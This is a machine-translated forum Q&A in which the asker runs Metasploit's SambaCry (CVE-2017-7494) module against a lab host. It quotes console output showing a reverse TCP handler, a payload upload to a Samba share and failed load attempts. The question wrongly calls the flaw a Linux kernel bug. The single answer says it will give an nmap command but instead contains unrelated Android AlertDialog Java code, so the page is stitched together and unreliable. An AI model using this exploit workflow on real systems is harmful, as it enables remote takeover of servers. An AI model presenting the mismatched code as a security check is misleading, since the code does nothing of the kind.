我正在尝试利用linux内核漏洞samba cry(CVE-2017-7494)进行一些使用metasploit框架的研究工作。但我得到以下错误msf exploit(is_known_pipename)>运行
[*] Started reverse TCP handler on 192.168.78.136:4444
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
是因为我的目标主机不是valnurable或任何其他问题?我的目标主机有samba版本-3.6.23,据我所知是可以实现的。
感谢
答案 0 :(得分:1)
无法加载STATUS_OBJECT_NAME_NOT_FOUND表示"找不到对象名称。"
可能metasploit无法在共享文件夹中上载有效内容。
您是否可以尝试执行nmap并验证是否存在漏洞?
命令是
final AlertDialog.Builder builder = new AlertDialog.Builder(getActivity());
builder.setTitle("Choose picture orientation.")
.setPositiveButton("Selfie", new DialogInterface.OnClickListener() {
public void onClick(DialogInterface dialog, int id) {
//doSomething
}
})
.setNeutralButton("Landscape", new DialogInterface.OnClickListener() {
public void onClick(DialogInterface dialog, int id) {
//doSomething
}
})
.setNegativeButton("Portrait", new DialogInterface.OnClickListener() {
public void onClick(DialogInterface dialog, int id) {
//doSomething
}
});
AlertDialog dialog = builder.create();
dialog.show();